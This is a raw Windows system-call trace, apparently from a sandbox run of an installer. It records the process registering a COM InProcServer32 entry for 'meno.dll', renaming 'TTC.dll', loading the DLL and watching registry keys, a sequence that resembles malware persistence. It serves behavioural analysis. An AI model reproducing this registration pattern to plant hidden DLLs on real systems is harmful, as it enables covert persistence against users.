 01571   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01572   456   NtSetValueKey  (86, " (86, "", 0, 1, "\0\0", 2, ... ) \0\0", 2, ... ) == 0x0
 01573   456   NtClose  (86, ... ) == 0x0
 01574   456   NtQueryKey  (90, Name, 382, ... {Name= (90, Name, 382, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01575   456   NtOpenKey  (0x2000000, {24, 90, 0x40, 0, 0,  (0x2000000, {24, 90, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01576   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes"}, ... 84, ) }, ... 84, ) == 0x0
 01577   456   NtCreateKey  (0x2, {24, 84, 0x40, 0, 0,  (0x2, {24, 84, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, 0, 0x0, 0, ... 116, 1, ) }, 0, 0x0, 0, ... 116, 1, ) == 0x0
 01578   456   NtClose  (84, ... ) == 0x0
 01579   456   NtQueryKey  (118, Name, 392, ... {Name= (118, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 01580   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01581   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 84, ) == 0x0
 01582   456   NtQueryInformationToken  (84, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01583   456   NtClose  (84, ... ) == 0x0
 01584   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01585   456   NtSetValueKey  (118, " (118, "", 0, 1, "C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\\0m\0e\0n\0o\0.\0d\0l\0l\0\0\0", 78, ... ) C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\\0m\0e\0n\0o\0.\0d\0l\0l\0\0\0", 78, ... ) == 0x0
 01586   456   NtClose  (118, ... ) == 0x0
 01587   456   NtQueryKey  (90, Name, 382, ... {Name= (90, Name, 382, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01588   456   NtOpenKey  (0x2000000, {24, 90, 0x40, 0, 0,  (0x2000000, {24, 90, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01589   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes"}, ... 116, ) }, ... 116, ) == 0x0
 01590   456   NtCreateKey  (0x2, {24, 116, 0x40, 0, 0,  (0x2, {24, 116, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, 0, 0x0, 0, ... 84, 2, ) }, 0, 0x0, 0, ... 84, 2, ) == 0x0
 01591   456   NtClose  (116, ... ) == 0x0
 01592   456   NtQueryKey  (86, Name, 392, ... {Name= (86, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 01593   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01594   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01595   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01596   456   NtClose  (116, ... ) == 0x0
 01597   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01598   456   NtSetValueKey  (86,  (86, "ThreadingModel", 0, 1, "A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0", 20, ... ) , 0, 1,  (86, "ThreadingModel", 0, 1, "A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0", 20, ... ) , 20, ... ) == 0x0
 01599   456   NtClose  (86, ... ) == 0x0
 01600   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion"}, ... 84, ) }, ... 84, ) == 0x0
 01601   456   NtQueryValueKey  (84,  (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 01602   456   NtQueryValueKey  (84,  (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 01603   456   NtClose  (84, ... ) == 0x0
 01604   456   NtOpenFile  (0x110080, {24, 0, 0x40, 0, 0,  (0x110080, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\TTC.dll"}, 7, 2113568, ... 84, {status=0x0, info=1}, ) }, 7, 2113568, ... 84, {status=0x0, info=1}, ) == 0x0
 01605   456   NtQueryInformationFile  (84, 1244340, 8, AttributeFlag, ... ) == STATUS_INVALID_PARAMETER
 01606   456   NtSetInformationFile  (84, 1380120, 100, Rename, ...
 01607   456   NtClose  (-2147482020, ... ) == 0x0
 01606   456   NtSetInformationFile  ... {status=0x0, info=0}, ) == 0x0
 01608   456   NtClose  (84, ... ) == 0x0
 01609   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1244440, ... ) }, 1244440, ... ) == 0x0
 01610   456   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1244420,  (0x40100080, {24, 0, 0x40, 0, 1244420, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 0x0, 32, 1, 2, 96, 0, 0, ... ) }, 0x0, 32, 1, 2, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_COLLISION
 01611   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01612   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01613   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242296, ... ) }, 1242296, ... ) == 0x0
 01614   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01615   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 84, ... 116, ) == 0x0
 01616   456   NtClose  (84, ... ) == 0x0
 01617   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x960000), 0x0, 12288, ) == 0x0
 01618   456   NtClose  (116, ... ) == 0x0
 01619   456   NtUnmapViewOfSection  (-1, 0x960000, ... ) == 0x0
 01620   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242224, ... ) }, 1242224, ... ) == 0x0
 01621   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 116, {status=0x0, info=1}, ) }, 5, 96, ... 116, {status=0x0, info=1}, ) == 0x0
 01622   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 116, ... 84, ) == 0x0
 01623   456   NtClose  (116, ... ) == 0x0
 01624   456   NtMapViewOfSection  (84, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x960000), 0x0, 12288, ) == 0x0
 01625   456   NtClose  (84, ... ) == 0x0
 01626   456   NtUnmapViewOfSection  (-1, 0x960000, ... ) == 0x0
 01627   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 01628   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 01629   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01630   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 84, ... 116, ) == 0x0
 01631   456   NtQuerySection  (116, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01632   456   NtClose  (84, ... ) == 0x0
 01633   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x10000000), 0x0, 24576, ) == 0x0
 01634   456   NtClose  (116, ... ) == 0x0
 01635   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01636   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01637   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01638   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01639   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01640   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01641   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01642   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01643   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01644   456   NtProtectVirtualMemory  (-1, (0x10004008), 4, 64, ... (0x10004000), 4096, 4, ) == 0x0
 01645   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "meno.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01646   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\meno.dll"}, 1242400, ... ) }, 1242400, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01647   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "meno.dll"}, 1242400, ... ) }, 1242400, ... ) == 0x0
 01648   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\meno.dll"}, 1242400, ... ) }, 1242400, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01649   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "meno.dll"}, 1242400, ... ) }, 1242400, ... ) == 0x0
 01650   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\meno.dll"}, 5, 96, ... 116, {status=0x0, info=1}, ) }, 5, 96, ... 116, {status=0x0, info=1}, ) == 0x0
 01651   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 116, ... 84, ) == 0x0
 01652   456   NtQuerySection  (84, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01653   456   NtClose  (116, ... ) == 0x0
 01654   456   NtMapViewOfSection  (84, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x960000), 0x0, 172032, ) == STATUS_IMAGE_NOT_AT_BASE
 01655   456   NtProtectVirtualMemory  (-1, (0x961000), 114688, 4, ... (0x961000), 114688, 32, ) == 0x0
 01656   456   NtProtectVirtualMemory  (-1, (0x97d000), 24576, 4, ... (0x97d000), 24576, 2, ) == 0x0
 01657   456   NtProtectVirtualMemory  (-1, (0x987000), 4096, 4, ... (0x987000), 4096, 2, ) == 0x0
 01658   456   NtProtectVirtualMemory  (-1, (0x988000), 8192, 4, ... (0x988000), 8192, 2, ) == 0x0
 01659   456   NtMapViewOfSection  (84, -1, (0x960000), 0, 0, 0x0, 172032, 1, 0, 4, ... ) == STATUS_CONFLICTING_ADDRESSES
 01660   456   NtProtectVirtualMemory  (-1, (0x961000), 114688, 16, ... (0x961000), 114688, 4, ) == 0x0
 01661   456   NtProtectVirtualMemory  (-1, (0x97d000), 24576, 2, ... (0x97d000), 24576, 4, ) == 0x0
 01662   456   NtProtectVirtualMemory  (-1, (0x987000), 4096, 2, ... (0x987000), 4096, 8, ) == 0x0
 01663   456   NtProtectVirtualMemory  (-1, (0x988000), 8192, 2, ... (0x988000), 8192, 8, ) == 0x0
 01664   456   NtFlushInstructionCache  (-1, 0, 0, ... ) == 0x0
 01665   456   NtClose  (84, ... ) == 0x0
 01666   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01667   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01668   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01669   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01670   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01671   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01672   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01673   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01674   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01675   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01676   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01677   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01678   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01679   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01680   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01681   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01682   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01683   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01684   456   NtProtectVirtualMemory  (-1, (0x97d000), 600, 4, ... (0x97d000), 4096, 2, ) == 0x0
 01685   456   NtProtectVirtualMemory  (-1, (0x97d000), 4096, 2, ... (0x97d000), 4096, 4, ) == 0x0
 01686   456   NtFlushInstructionCache  (-1, 9949184, 600, ... ) == 0x0
 01687   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01688   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 10027008, 65536, ) == 0x0
 01689   456   NtAllocateVirtualMemory  (-1, 10027008, 0, 4096, 4096, 4, ... 10027008, 4096, ) == 0x0
 01690   456   NtAllocateVirtualMemory  (-1, 10031104, 0, 8192, 4096, 4, ... 10031104, 8192, ) == 0x0
 01691   456   NtAllocateVirtualMemory  (-1, 10039296, 0, 4096, 4096, 4, ... 10039296, 4096, ) == 0x0
 01692   456   NtQueryPerformanceCounter  (... {116740682, 0}, {3579545, 0}, ) == 0x0
 01693   456   NtFindAtom  ( ("t\0t\0c\0g\0f\0a\0", 12, 1243748, ... ) , 12, 1243748, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01694   456   NtAddAtom  ( ("t\0t\0c\0g\0f\0a\0", 12, 1243748, ... ) , 12, 1243748, ... ) == 0x0
 01695   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 1241352, ... ) }, 1241352, ... ) == 0x0
 01696   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01697   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 84, ... 116, ) == 0x0
 01698   456   NtClose  (84, ... ) == 0x0
 01699   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x9b0000), 0x0, 262144, ) == 0x0
 01700   456   NtClose  (116, ... ) == 0x0
 01701   456   NtUnmapViewOfSection  (-1, 0x9b0000, ... ) == 0x0
 01702   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 116, ) }, ... 116, ) == 0x0
 01703   456   NtQueryValueKey  (116,  (116, "Com+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (116, "Com+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01704   456   NtClose  (116, ... ) == 0x0
 01705   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "CLBCATQ.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01706   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\CLBCATQ.DLL"}, 1241124, ... ) }, 1241124, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01707   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "CLBCATQ.DLL"}, 1241124, ... ) }, 1241124, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01708   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\CLBCATQ.DLL"}, 1241124, ... ) }, 1241124, ... ) == 0x0
 01709   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\CLBCATQ.DLL"}, 5, 96, ... 116, {status=0x0, info=1}, ) }, 5, 96, ... 116, {status=0x0, info=1}, ) == 0x0
 01710   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 116, ... 84, ) == 0x0
 01711   456   NtQuerySection  (84, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01712   456   NtClose  (116, ... ) == 0x0
 01713   456   NtMapViewOfSection  (84, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76fd0000), 0x0, 491520, ) == 0x0
 01714   456   NtClose  (84, ... ) == 0x0
 01715   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "COMRes.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01716   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\COMRes.dll"}, 1240320, ... ) }, 1240320, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01717   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "COMRes.dll"}, 1240320, ... ) }, 1240320, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01718   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\COMRes.dll"}, 1240320, ... ) }, 1240320, ... ) == 0x0
 01719   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\COMRes.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01720   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 84, ... 116, ) == 0x0
 01721   456   NtQuerySection  (116, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01722   456   NtClose  (84, ... ) == 0x0
 01723   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77050000), 0x0, 806912, ) == 0x0
 01724   456   NtClose  (116, ... ) == 0x0
 01725   456   NtOpenKey  (0xf003f, {24, 48, 0x40, 0, 0,  (0xf003f, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3\Debug"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01726   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3\Debug"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01727   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\OLE"}, ... 116, ) }, ... 116, ) == 0x0
 01728   456   NtQueryValueKey  (116,  (116, "MinimumFreeMemPercentageToCreateProcess", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01729   456   NtQueryValueKey  (116,  (116, "MinimumFreeMemPercentageToCreateObject", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01730   456   NtClose  (116, ... ) == 0x0
 01731   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\Registration"}, 1241152, ... ) }, 1241152, ... ) == 0x0
 01732   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01733   456   NtQueryInformationProcess  (-1, Wow64, 4, ... {process info, class 26, size 4}, 0x0, ) == 0x0
 01734   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 116, ) }, ... 116, ) == 0x0
 01735   456   NtQueryValueKey  (116,  (116, "Com+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (116, "Com+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01736   456   NtClose  (116, ... ) == 0x0
 01737   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Classes"}, ... 116, ) }, ... 116, ) == 0x0
 01738   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 84, ) == 0x0
 01739   456   NtNotifyChangeKey  (116, 84, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01740   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 100, ) }, ... 100, ) == 0x0
 01741   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 96, ) == 0x0
 01742   456   NtNotifyChangeKey  (100, 96, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01743   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 120, ) == 0x0
 01744   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER"}, ... 124, ) }, ... 124, ) == 0x0
 01745   456   NtSetInformationObject  (124, Handle, {Inherit=0,ProtectFromClose=1,}, 2011365632, ... ) == 0x0
 01746   456   NtNotifyChangeKey  (124, 120, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01747   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Classes"}, ... 128, ) }, ... 128, ) == 0x0
 01748   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 132, ) == 0x0
 01749   456   NtNotifyChangeKey  (128, 132, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01750   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 136, ) == 0x0
 01751   456   NtNotifyChangeKey  (124, 136, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01752   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 140, ) }, ... 140, ) == 0x0
 01753   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 144, ) == 0x0
 01754   456   NtNotifyChangeKey  (140, 144, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01755   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 148, ) }, ... 148, ) == 0x0
 01756   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 152, ) == 0x0
 01757   456   NtNotifyChangeKey  (148, 152, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01758   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Classes\CLSID"}, ... 156, ) }, ... 156, ) == 0x0
 01759   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 160, ) == 0x0
 01760   456   NtNotifyChangeKey  (156, 160, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01761   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Classes"}, ... 164, ) }, ... 164, ) == 0x0
 01762   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 168, ) == 0x0
